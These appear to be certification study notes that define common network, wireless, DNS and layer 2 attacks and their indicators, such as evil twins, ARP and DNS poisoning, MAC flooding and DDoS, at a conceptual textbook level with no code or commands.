1.4 Given a scenario, analyze potential indicators associated with network attacks.
Wireless - Initialization vector (IV)
** (Review) Once the hash is captured it can be subjected to offline brute-force and dictionary cracking. In WEP, these are referred to as initialization vector (IV) attacks, because they exploit flaws in the mechanism that is supposed to ensure a unique keystream, given the same key.
On-path Attack/MitM Attack
A MitM or on-path attack is where the threat actor gains a position between two hosts, and transparently captures, monitors, and relays all communication between the hosts. Example: An on-path attack could also be used to covertly modify the traffic. For example, a MitM host could present a workstation with a spoofed website form, to try to capture the user credential. *Previously known as man-in-the-middle attack/man-in-the-browser attack
Wireless - Radio frequency identification (RFID)
A means of encoding information into passive tags, which can be easily attached to devices, structures, clothing, or almost anything else. *A passive tag can have a range from a few centimeters to a few meters.
Wireless - Evil Twin
A rogue WAP masquerading as a legitimate one is called an evil twin. An evil twin might just have a similar name (SSID) to the legitimate one, or the attacker might use some DoS technique to overcome the legitimate WAP. This attack will not succeed if authentication security is enabled on the WAP, unless the attacker also knows the details of the authentication method.
Wireless - Rogue Access Point
A rogue access point is one that has been installed on the network without authorization, whether with malicious intent or not. More details: It is vital to periodically survey the site to detect rogue WAPs. A malicious user can set up such an access point with something as basic as a smartphone with tethering capabilities, and a non-malicious user could enable such an access point by accident.
Domain name system (DNS) - Uniform Resource / Locator URL Redirection ?
A uniform resource locator (URL) is an address for the pages and files published as websites. A URL comprises a FQDN, file path, and often script parameters. URL redirection refers to the use of HTTP redirects to open a page other than the one the user requested. This is often used for legitimate purposes—to send the user to a login page or to send a mobile device browser to a responsive version of the site, for instance.
Malicious code or script execution - Python
Attack the infrastructure - Routers, servers, switches
Layer 2 attacks - Protocol (ARP) poisoning
An ARP poisoning attack uses a packet crafter, such as Ettercap, to broadcast unsolicited ARP reply packets. Because ARP has no security mechanism, the receiving devices trust this communication and update their MAC:IP address cache table with the spoofed address. Example: If the ARP poisoning attack is successful, all traffic destined for remote networks will be sent to the attacker. The attacker can perform a man-in-the-middle attack, either by monitoring the communications and then forwarding them to the router to avoid detection, or modifying the packets before forwarding them. The attacker could also perform a denial of service attack by not forwarding the packets.
Wireless - Jamming
Decrease signal to A wireless network can be disrupted by interference from other radio sources. These are often unintentional, but it is also possible for an attacker to purposefully jam an access point. This might be done simply to disrupt services or to position an evil twin on the network with the hope of stealing data. A Wi-Fi jamming attack can be performed by setting up a WAP with a stronger signal. Wi-Fi jamming devices are also widely available, though they are often illegal to use and sometimes to sell. Such devices can be very small, but the attacker still needs to gain fairly close physical proximity to the wireless network.
Domain name system (DNS) - DNS poisoning
DNS poisoning is an attack that compromises the process by which clients query name servers to locate the IP address for a FQDN. There are several ways that a DNS poisoning attack can be perpetrated. 1,Man in the Middle - If the threat actor has access to the same local network as the victim, the attacker can use ARP poisoning to respond to DNS queries from the victim with spoofed replies. This might be combined with a denial of service attack on the victim's legitimate DNS server. A rogue DHCP could be used to configure clients with the address of a rogue DNS resolver 2.DNS Client Cache Poisoning -Even though all name resolution now functions through DNS, the HOSTS file is still present and most operating systems check the file before using DNS. Its contents are loaded into a cache of known name:IP mappings and the client only contacts a DNS server if the name is not cached. Therefore, if an attacker is able to place a false name:IP address mapping in the HOSTS file and effectively poison the DNS cache, he or she will be able to redirect traffic. The HOSTS file requires administrator access to modify 3.DNS server cache poisoning aims to corrupt the records held by the DNS server itself. This can be accomplished by performing DoS against the server that holds the authorized records for the domain, and then spoofing replies to requests from other name servers. Another attack involves getting the victim name server to respond to a recursive query from the attacking host. A recursive query compels the DNS server to query the authoritative server for the answer on behalf of the client. The attacker's DNS, masquerading as the authoritative name server, responds with the answer to the query, but also includes a lot of false domain:IP mappings for other domains that the victim DNS accepts as genuine. The nslookup or dig tool can be used to query the name records and cached records held by a server to discover whether any false records have been inserted
Domain name system (DNS) - Domain hijacking
Domain hijacking is an attack where an adversary acquires a domain for a company's trading name or trademark, or perhaps some spelling variation thereof. Example: In a domain hijacking attack an adversary gains control over the registration of a domain name, allowing the host records to be configured to IP addresses of the attacker's choosing. This might be accomplished by supplying false credentials to the domain registrar when applying for a new domain name or re-registering an existing one.
Domain name system (DNS) - Domain reputation ?
If your domain, website, or email servers have been hijacked, they are likely to be used for spam or distributing malware. his will lead to complaints and the likelihood of the domain being listed on a blacklist. You should set up monitoring using a site such as talosintelligence.com/reputation_center to detect misuse early.
Malicious code or script execution - Bash
In Linux, the command line is usually Bourne Again Shell (Bash). Many Linux systems have Python enabled as well. Python scripts or batch files of bash commands can be used for automation tasks, such as backup, or for malicious purposes.
Layer 2 attacks - MAC cloning
MAC cloning, or MAC address spoofing, changes the hardware address configured on an adapter interface or asserts the use of an arbitrary MAC address.
Distributed denial-of-service (DDoS) - Application
Make the application break or work harder - Increase downtime and costs • Fill the disk space - A 42 kilobyte .zip compressed file - Uncompresses to 4.5 petabytes (4,500 terabytes) - Anti-virus will identify these • Overuse a measured cloud resource - More CPU/memory/network is more money • Increase the cloud server response time - Victim deploys a new application instance - repeat
Distributed denial-of-service (DDoS) - Network
Most denial of service (DoS) attacks against websites and gateways are distributed DoS (DDoS). This means that the attack is launched from multiple hosts simultaneously. Typically, a threat actor will compromise machines to use as handlers in a command and control network. The handlers are used to compromise hundreds or thousands or millions of hosts with DoS tools (bots) forming a botnet.
Wireless - Bluesnarfing
Refers to using an exploit in Bluetooth to steal information from someone else's phone. More details: The exploit (now patched) allows attackers to circumvent the authentication mechanism. Even without an exploit, a short (4 digit) PIN code is vulnerable to brute force password guessing.
Layer 2 attacks - Address Resolution
The Address Resolution Protocol (ARP) maps a network interface's hardware (MAC) address to an IP address. The ARP cache shows the MAC address of the interface associated with each IP address the local host has communicated with recently.
Distributed denial-of-service (DDoS) - Operational technology (OT)
The hardware and software for industrial equipment - Electric grids, traffic control, manufacturing plants, etc. • This is more than a web server failing - Power grid drops offline - All traffic lights are green - Manufacturing plant shuts down • Requires a different approach - A much more critical security posture
Wireless - Disassociation
This sends a stream of spoofed frames to cause a client to deauthenticate from a WAP. * May be coupled with a rogue WAP More details: The deauth frames spoof the MAC address of the target station. This might allow the attacker to perform a replay attack aimed at recovering the network key or interpose a rogue WAP.
Wireless - Near-field communication (NFC)
Two-way wireless communication * Builds on RFID, which is mostly one-way Note - NFC does not provide encryption, so eavesdropping and man-in-the-middle attacks are possible if the attacker can find some way of intercepting the communication and the software services are not encrypting the data. Note 2 - Despite having a close physical proximity requirement, NFC is vulnerable to several types of attacks. Certain antenna configurations may be able to pick up the RF signals emitted by NFC from several feet away, giving an attacker the ability to eavesdrop from a more comfortable distance. An attacker with a reader may also be able to skim information from an NFC device in a crowded area, such as a busy train. An attacker may also be able to corrupt data as it is being transferred through a method similar to a DoS attack—by flooding the area with an excess of RF signals to interrupt the transfer.
Wireless - Bluejacking
Unless some sort of authentication is configured, a discoverable device is vulnerable to bluejacking, a sort of spam where someone sends you an unsolicited text (or picture/video) message or vCard (contact details). This can also be a vector for malware, as demonstrated by the Obad Android Trojan malware
Layer 2 attacks - Media access control (MAC) flooding
Where ARP poisoning is directed at hosts, MAC flooding is used to attack a switch. The intention of the attacker is to exhaust the memory used to store the switch's MAC address table. *The switch uses the MAC address table to determine which port to use to forward unicast traffic to its correct destination.
Malicious code or script execution - Macros
• Automate functions within an application - Or operating system • Designed to make the application easier to use - Can often create security vulnerabilities • Attackers create automated exploits - They just need the user to open the file - Prompts to run the macro
Malicious code or script execution - Visual Basic for Applications (VBA)
• Automates processes within Windows applications - Common in Microsoft Office • A powerful programming language - Interacts with the operating system • CVE-2010-0815 / MS10-031 - VBA does not properly search for ActiveX controls in a document - Run arbitrary code embedded in a document - Easy to infect a computer Microsoft Office uses the Visual Basic for Applications (VBA) language, while PDF documents use JavaScript.
Malicious code or script execution - PowerShell
• Command line for system administrators - .ps1 file extension - Included with Windows 8/8.1 and 10 • Extend command-line functions - Uses cmdlets (command-lets) - PowerShell scripts and functions - Standalone executables • Attack Windows systems - System administration - Active Domain administration - File share access
